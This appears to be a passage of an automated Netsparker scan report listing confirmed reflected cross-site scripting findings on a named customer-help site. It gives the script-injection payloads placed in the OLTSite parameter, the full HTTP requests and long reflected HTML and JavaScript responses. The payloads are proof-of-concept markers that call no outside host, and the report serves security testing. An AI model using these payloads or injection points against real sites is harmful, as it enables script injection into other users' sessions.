src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000503)%5C/script%5E&p_sid=Wm6S1Ksk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x000503)</script>&p_sid=Wm6S1Ksk&amp;p_accessibility=1&amp;p_redirect=3"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> <table cellpadding="0" cellspacing="4" border="0" width="100%"> <tr> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinl.gif" alt="" /></td> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="general_help_tab_bar_btn" align="center" nowrap><a class="selsubtab" href="help_general.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000503)%5C/script%5E&p_sid=Wm6S1Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_depth=1">General Help</a></td> </tr> <tr> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutl.gif" alt="" /></td> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="search_tips_tab_bar_btn" align="center" nowrap><a class="subtab" href="help_search.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000503)%5C/script%5E&p_sid=Wm6S1Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_depth=1">Search Tips</a></td> </tr> <tr> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><!-- Top border ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><!-- Help Text ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="hcell"><span class="smtext">As you search for answers to your questions, you can easily move from one function to another using the tabs on the tab bar. <b>Be aware that you must have a customer account to access certain functions.</b><br><br>Note: This site contains the Accessible Links function in compliance with Section 508 of the Rehabilitation Act. It can be activated using accessibility software, such as a screen reader, or through this keystroke sequence: From a page other than Support Home, press <b>Tab</b> until the focus is on the My Stuff tab. Press <b>Tab</b> again and then press <b>Enter</b>.</span></td><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td class="form" align="right" ><img height="12" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><!-- Answers ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="bar"><h2 class="subtitle" >&nbsp;Answers</h2></td><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td class="hcell"> <span class="smtext">Click this tab to search the knowledge base and view answers. Click a subject link to view the details of an answer. </span></td></tr><tr><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><th class="subheading"><br />Search</th><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr&..
- /cgi-bin/olt.cfg/php/enduser/std_alp.php

/cgi-bin/olt.cfg/php/enduser/std_alp.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=$OLTSite%00%27%22--%3E%3C%2..

Parameters

Parameter Type Value
OLTSite GET $OLTSite'"--></style></script><script>alert(0x0005CD)</script>

Request

GET /cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=$OLTSite%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0005CD)%3C%2Fscript%3E HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:52:25 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=103062 t=1304117545488632
RNT-Machine: 11
Vary: Accept-Encoding
Content-Encoding:
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta name="robots" content="index, nofollow"><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Find Answers</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script language="javascript" type="text/javascript"> // ----------------------function find_ancestor(obj, tag_name){ if (!obj) return(false); while (obj.tagName != tag_name) if (!(obj = obj.parentNode)) return(false); return(obj);}// -------------------------------------------------------------------function find_evtsrc_ancestor(tag_name){ var obj = event.srcElement; while (obj.tagName != tag_name) if (!(obj = obj.parentNode)) return(false); return(obj);}// -------------------------------------------------------------------function sl_context_event(e){ var obj; if (!(obj = find_ancestor(e.srcElement, 'TR')) || obj.nosel) return; if (e.type == 'mouseover') { obj.oldClassName = obj.className; obj.className = 'highlight'; } else if (e.type == 'mouseout') obj.className = obj.oldClassName; else if (e.type == 'dblclick') alert('Edit '+obj.childNodes[0].innerText);}// -------------------------------------------------------------------function highlight(e){ var obj = e.srcElement; while ((obj.tagName != 'BUTTON') && (obj.tagName != 'menu_btn') && (obj.tagAs != 'button')) if (!(obj = obj.parentNode)) return(false); if (!obj || ((obj.btntype == 'toolbtn') && obj.disabled) || ((obj.btntype == 'togglebtn') && obj.disabled) || ((obj.tagName == 'menu_btn') && !obj.enabled)) return(true); var mod = (obj.className.substr(0, 7) == 'toolbtn') ? '' : obj.className.charAt(0); if (!obj.btntype || obj.btntype == 'toolbtn') { if (e.type == 'mousedown') obj.className = mod + 'toolbtn_in'; else if ((e.type == 'mouseup') || (e.type == 'mouseover')) obj.className = mod + 'toolbtn_out'; else if (e.type == 'mouseout') obj.className = mod + 'toolbtn'; } else if (obj.btntype == 'togglebtn') { if (e.type == 'mousedown') { //if (!obj.toggled) obj.className = mod + 'toolbtn_down'; obj.toggled = !obj.toggled; } else if (e.type == 'mouseup' || e.type == 'mouseout') { if (obj.toggled) obj.className = mod + 'toolbtn_in'; else obj.className = mod + 'toolbtn'; } else if (e.type == 'mouseover') { obj.className = mod + 'toolbtn_out'; } } else return(true);}// -------------------------------------------------------------------function size_buttons(){ var sz_args = Array(); var i, j, w, tmp_w, asz = arguments.length - 1; for (i = j = 0; i < asz; i++) if (arguments[i]) sz_args[j++] = arguments[i].offsetWidth; tmp_w = Math.max.apply(null, sz_args) + arguments[asz]; if (tmp_w < 47) w = '47px'; else w = tmp_w+'px'; for (i = 0; i < asz; i++) if (arguments[i]) arguments[i].style.width = w;}// ----------------------------------------------------------------------------function set_focus(flds){ var i, sz, f; var cnt = 0; for (f = flds[i = 0], sz = flds.length; i < sz; f = flds[i++]) if (!f.disabled && !f.isDisabled && !f.readOnly && f.tagName && (f.offsetWidth > 0) && (((f.tagName == 'INPUT') && (f.type == 'text')) || (f.tagName == 'TEXTAREA') || (f.tagName == 'SELECT'))) { f.focus(); if ((f.tagName == 'TEXTAREA') || (f.tagName == 'INPUT')) f.select(); return; } window.focus();}// ----------------------------------------------------------------------------function optlist_str(optlist, val){ var i, sz = optlist.options.length; if (!val) return(''); for (i = 0; i < sz; i++) if (optlist.options[i].value == val) return(optlist.options[i].text); return(null);}// ----------------------------------------------------------------------------function optlist_set(optlist, val){ var i, ckval, sz = optlist.options.length; if (optlist.multiple) { if (val) { for (i = 0, ckval = ',' + val + ','; i < sz; i++) if (ckval.indexOf(',' + optlist.options[i].value + ',') != -1) optlist.options[i].selected = true; else optlist.options[i].selected = false; } else optlist.selectedIndex = -1; return; } else { for (i = 0; i < sz; i++) { if ((!val && optlist.options[i].defaultSelected) || (optlist.options[i].value === val)) { optlist.selectedIndex = i; return; } } } optlist.selectedIndex = 0;}// ----------------------------------------------------------------------------function get_element_pos(el){ var obj, pos = new Array(); var xb, yb, x_pos = el.offsetLeft, y_pos = el.offsetTop; for (obj = el.offsetParent; obj; obj = obj.offsetParent) { xb = parseInt(obj.currentStyle.borderTopWidth); yb = parseInt(obj.currentStyle.borderLeftWidth); x_pos += obj.offsetLeft + (isNaN(xb) ? 0 : xb); y_pos += obj.offsetTop + (isNaN(yb) ? 0 : yb); } pos.left = x_pos; pos.top = y_pos; return(pos);}// ----------------------------------------------------------------------------function names2name(first, last, blank){ if (!first && !last) { if (blank) return ''; else { if("MsgGet" in window.external) return(window.external.MsgGet("NO_NAME_LBL")); else { return msgBase.MsgGet("NO_NAME_LBL"); } } } if (first && last) { if ("MsgGet" in window.external && window.external.MsgGet("intl_nameorder") == '1') return(last + ' ' + first); else if(msgBase.MsgGet('(101)') && msgBase.MsgGet('(101)') == '1') return(last + ' ' + first); else return(first + ' ' + last); } if (first) return(first); return(last);}// ----------------------------------------------------------------------------function open_from_session(url, win_name, win_features){ var new_win, obj = get_session_frame(); if (!win_name) win_name = '_blank'; if (obj) new_win = obj.open(url, win_name, win_features); else new_win = window.open(url, win_name, win_features); if (obj.win && obj.win_cnt) obj.win[obj.win_cnt++] = new_win; else if (new_win && win_cnt) win[win_cnt++] = new_win;}// ----------------------------------------------------------------------------function win_close(){ var i; for (i = 1; i < win_cnt+1; i++) if (win[i]) win[i].close();}// ----------------------------------------------------------------------------function get_session_frame(){ var obj; if (window.parent) obj = window.parent; while (!obj.document.getElementById('session_frameset')) { if (!obj.opener && !obj.parent && !obj.document.getObjectById('session_frameset')) //Not session window at origin return(obj); if (obj.opener) obj = obj.opener; else if (obj.parent) obj = obj.parent; } if (obj.document.getElementById('session_frameset')) return(obj); else alert('Did not find Session Frameset');}// ----------------------------------------------------------------------------var dtu = new Array("MINUTES0", "HOURS0", "HOURS1", "DAYS0", "DAYS1", "WEEKS0", "WEEKS1", "MONTHS0", "MONTHS1", "QUARTERS0", "QUARTERS1", "YEARS0", "YEARS1");function js_topairs(rstr){ var pstr = ''; var re = /,/g; var divpat = /(.+):(.+)=(.+)/; var dtpat = /(.+)=(.*)\|(.+|$)/; var fceqpat = /(.+)=(.+)/; var ordpat = /(.+)=(.+):(.+);(.+):(.+)/; var tstr = '', ttype = ''; var df = new Array(5); var dt = new Array(5); var from_str, to_str; var ttype_set = false; var cnt = 1; var pfx1 = '$qryargs["search_args"]["search_field'; var pfx2 = '"]=array("name"=>"'; var seq = '","compare_value"=>"'; var trimseq = '","compare_value"=>trim(unescape("'; var dtseq = '","compare_value"=>'; var trimopo = '")),"oper_id"=>intval("1"));'; var opo = '","oper_id"=>intval("1"));'; var mkstr = "mktime("; var date_re = /(\d+)\s+\/\s+(\d+)\s+\/\s+(\d+)/; var dt_re = /(\d+)\s+\/\s+(\d+)\s+\/\s+(\d+)\s+(\d+)\s*:\s*(\d+)/; // document.body.style.cursor = 'wait'; part = rstr.split('||'); for (i = 0, pl = part.length; i < pl; i++) { if (part[i].substr(1,3) == 'div') { res = part[i].match(divpat); if (res) pstr += pfx1 + cnt++ + pfx2 + res[2] + seq + res[3] + '","oper_id"=>intval("' + ((res[3] == '~null~') ? 12 : (res[3] == '~notnull~') ? 13 : 10) + '"));'; } else if (part[i].substr(0,8) == 'date_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(',,'); for (j = 0, tl = tmp.length -1 ; j < tl; j++) { from_str = to_str = ''; res = tmp[j].match(dtpat); if (res[2] != '') { if (res[2].indexOf("/") != -1) { dp = res[2].match(date_re); from_str = mkstr + '0,0,0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[2].split(':'); tmpstr = dtu[parseInt(rp[2])]; from_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (res[3] != '') { if (res[3].indexOf("/") != -1) { dp = res[3].match(date_re); to_str = mkstr + '0,0,0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; // to_str = 'datestr2time("' + res[3] + '")'; } else { rp = res[3].split(':'); tmpstr = dtu[parseInt(rp[2])]; to_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (from_str == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + to_str + ',"oper_id"=>intval("4"));'; else if (to_str == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ',"oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ". '|' . " + to_str + ',"oper_id"=>intval("9"));'; } } else if (part[i].substr(0,6) == 'dt_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(',,'); for (j = 0, tl = tmp.length -1 ; j < tl; j++) { from_str = to_str = ''; res = tmp[j].match(dtpat); if (res[2] != '') { if (res[2].indexOf("/") != -1) { dp = res[2].match(dt_re); if(dp) from_str = mkstr + dp[4]+','+dp[5]+',0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[2].split(':'); tmpstr = dtu[parseInt(rp[2])]; from_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (res[3] != '') { if (res[3].indexOf("/") != -1) { dp = res[3].match(dt_re); if(dp) to_str = mkstr + dp[4]+','+dp[5]+',0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[3].split(':'); tmpstr = dtu[parseInt(rp[2])]; to_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (from_str == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + to_str + ',"oper_id"=>intval("4"));'; else if (to_str == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ',"oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ". '|' . " + to_str + ',"oper_id"=>intval("9"));'; } } else if (part[i].substr(0,7) == 'int_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2] + '", "oper_id"=>intval("9"));'; } } else if (part[i].substr(0,7) == 'cur_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); cval = res[2].split('|'); if (cval[0] == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + cval[1] + '", "oper_id"=>intval("4"));'; else if (cval[1] == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + cval[0] + '", "oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2] + '", "oper_id"=>intval("9"));'; } } else if (part[i].substr(0,8) == 'text_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); pstr += pfx1 + cnt++ + pfx2 + res[1] + trimseq + escape(res[2]) + trimopo; } } else if (part[i].substr(0,8) == 'orderby1') { if (part[i].indexOf('dflt') == -1) { res = part[i].match(ordpat); if (res[4] != 0) // 2nd level order pstr += "$p_gridsort=&quot;" + res[2] + ":" + res[3] + ";" + res[4] + ":" + res[5] + "&quot;; $qryargs[&quot;orderby_args&quot;][&quot;order_field1&quot;]=array(&quot;display_col&quot;=>&quot;" + res[2] + "&quot;,&quot;direction&quot;=>&quot;" + res[3] + "&quot;); $qryargs[&quot;orderby_args&quot;][&quot;order_field2&quot;]=array(&quot;display_col&quot;=>&quot;" + res[4] + "&quot;,&quot;direction&quot;=>&quot;" + res[5] + "&quot;);"; else pstr += "$p_gridsort=&quot;" + res[2] + ":" + res[3] + ";&quot;; $qryargs[&quot;orderby_args&quot;][&quot;order_field1&quot;]=array(&quot;display_col&quot;=>&quot;" + res[2] + "&quot;,&quot;direction&quot;=>&quot;" + res[3] + "&quot;);"; } else pstr += "$p_gridsort=&quot;&quot;;" } else if (part[i].substr(0,5) == 'limit') { pstr += '$limit=min(' + part[i].split('=')[1] + ', $vrl_hard);'; } else // multi-select { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); res = part[i].match(fceqpat); if (res) pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2].replace(/,/g, ';') + '","oper_id"=>intval("' + ((res[2] == '~null~') ? 12 : (res[2] == '~notnull~') ? 13 : 10) + '"));'; } } return(pstr);}// ----------------------------------------------------------------------------function size_dialog(win, divobj){ win.external.SetDlgSize(divobj.offsetWidth + 34, divobj.offsetHeight + 38);}// ----------------------------------------------------------------------------function obj_prop_cnt(obj){ var i, rv = 0; for (i in obj) rv++; return(rv);}// ----------------------------------------------------------------------------function obj_empty(obj){ var i; for (i in obj) return(false); return(true);}// ----------------------------------------------------------------------------function pairs2str(pairs, append_data){ var p = new Arra..
- /cgi-bin/olt.cfg/php/enduser/std_alp.php

/cgi-bin/olt.cfg/php/enduser/std_alp.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541%00%27%22--%..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x000620)</script>
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000620)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:53:33 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=90602 t=1304117613290413
RNT-Machine: 03
Vary: Accept-Encoding
Content-Encoding:
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta name="robots" content="index, nofollow"><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Find Answers</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script language="javascript" type="text/javascript"> // ----------------------function find_ancestor(obj, tag_name){ if (!obj) return(false); while (obj.tagName != tag_name) if (!(obj = obj.parentNode)) return(false); return(obj);}// -------------------------------------------------------------------function find_evtsrc_ancestor(tag_name){ var obj = event.srcElement; while (obj.tagName != tag_name) if (!(obj = obj.parentNode)) return(false); return(obj);}// -------------------------------------------------------------------function sl_context_event(e){ var obj; if (!(obj = find_ancestor(e.srcElement, 'TR')) || obj.nosel) return; if (e.type == 'mouseover') { obj.oldClassName = obj.className; obj.className = 'highlight'; } else if (e.type == 'mouseout') obj.className = obj.oldClassName; else if (e.type == 'dblclick') alert('Edit '+obj.childNodes[0].innerText);}// -------------------------------------------------------------------function highlight(e){ var obj = e.srcElement; while ((obj.tagName != 'BUTTON') && (obj.tagName != 'menu_btn') && (obj.tagAs != 'button')) if (!(obj = obj.parentNode)) return(false); if (!obj || ((obj.btntype == 'toolbtn') && obj.disabled) || ((obj.btntype == 'togglebtn') && obj.disabled) || ((obj.tagName == 'menu_btn') && !obj.enabled)) return(true); var mod = (obj.className.substr(0, 7) == 'toolbtn') ? '' : obj.className.charAt(0); if (!obj.btntype || obj.btntype == 'toolbtn') { if (e.type == 'mousedown') obj.className = mod + 'toolbtn_in'; else if ((e.type == 'mouseup') || (e.type == 'mouseover')) obj.className = mod + 'toolbtn_out'; else if (e.type == 'mouseout') obj.className = mod + 'toolbtn'; } else if (obj.btntype == 'togglebtn') { if (e.type == 'mousedown') { //if (!obj.toggled) obj.className = mod + 'toolbtn_down'; obj.toggled = !obj.toggled; } else if (e.type == 'mouseup' || e.type == 'mouseout') { if (obj.toggled) obj.className = mod + 'toolbtn_in'; else obj.className = mod + 'toolbtn'; } else if (e.type == 'mouseover') { obj.className = mod + 'toolbtn_out'; } } else return(true);}// -------------------------------------------------------------------function size_buttons(){ var sz_args = Array(); var i, j, w, tmp_w, asz = arguments.length - 1; for (i = j = 0; i < asz; i++) if (arguments[i]) sz_args[j++] = arguments[i].offsetWidth; tmp_w = Math.max.apply(null, sz_args) + arguments[asz]; if (tmp_w < 47) w = '47px'; else w = tmp_w+'px'; for (i = 0; i < asz; i++) if (arguments[i]) arguments[i].style.width = w;}// ----------------------------------------------------------------------------function set_focus(flds){ var i, sz, f; var cnt = 0; for (f = flds[i = 0], sz = flds.length; i < sz; f = flds[i++]) if (!f.disabled && !f.isDisabled && !f.readOnly && f.tagName && (f.offsetWidth > 0) && (((f.tagName == 'INPUT') && (f.type == 'text')) || (f.tagName == 'TEXTAREA') || (f.tagName == 'SELECT'))) { f.focus(); if ((f.tagName == 'TEXTAREA') || (f.tagName == 'INPUT')) f.select(); return; } window.focus();}// ----------------------------------------------------------------------------function optlist_str(optlist, val){ var i, sz = optlist.options.length; if (!val) return(''); for (i = 0; i < sz; i++) if (optlist.options[i].value == val) return(optlist.options[i].text); return(null);}// ----------------------------------------------------------------------------function optlist_set(optlist, val){ var i, ckval, sz = optlist.options.length; if (optlist.multiple) { if (val) { for (i = 0, ckval = ',' + val + ','; i < sz; i++) if (ckval.indexOf(',' + optlist.options[i].value + ',') != -1) optlist.options[i].selected = true; else optlist.options[i].selected = false; } else optlist.selectedIndex = -1; return; } else { for (i = 0; i < sz; i++) { if ((!val && optlist.options[i].defaultSelected) || (optlist.options[i].value === val)) { optlist.selectedIndex = i; return; } } } optlist.selectedIndex = 0;}// ----------------------------------------------------------------------------function get_element_pos(el){ var obj, pos = new Array(); var xb, yb, x_pos = el.offsetLeft, y_pos = el.offsetTop; for (obj = el.offsetParent; obj; obj = obj.offsetParent) { xb = parseInt(obj.currentStyle.borderTopWidth); yb = parseInt(obj.currentStyle.borderLeftWidth); x_pos += obj.offsetLeft + (isNaN(xb) ? 0 : xb); y_pos += obj.offsetTop + (isNaN(yb) ? 0 : yb); } pos.left = x_pos; pos.top = y_pos; return(pos);}// ----------------------------------------------------------------------------function names2name(first, last, blank){ if (!first && !last) { if (blank) return ''; else { if("MsgGet" in window.external) return(window.external.MsgGet("NO_NAME_LBL")); else { return msgBase.MsgGet("NO_NAME_LBL"); } } } if (first && last) { if ("MsgGet" in window.external && window.external.MsgGet("intl_nameorder") == '1') return(last + ' ' + first); else if(msgBase.MsgGet('(101)') && msgBase.MsgGet('(101)') == '1') return(last + ' ' + first); else return(first + ' ' + last); } if (first) return(first); return(last);}// ----------------------------------------------------------------------------function open_from_session(url, win_name, win_features){ var new_win, obj = get_session_frame(); if (!win_name) win_name = '_blank'; if (obj) new_win = obj.open(url, win_name, win_features); else new_win = window.open(url, win_name, win_features); if (obj.win && obj.win_cnt) obj.win[obj.win_cnt++] = new_win; else if (new_win && win_cnt) win[win_cnt++] = new_win;}// ----------------------------------------------------------------------------function win_close(){ var i; for (i = 1; i < win_cnt+1; i++) if (win[i]) win[i].close();}// ----------------------------------------------------------------------------function get_session_frame(){ var obj; if (window.parent) obj = window.parent; while 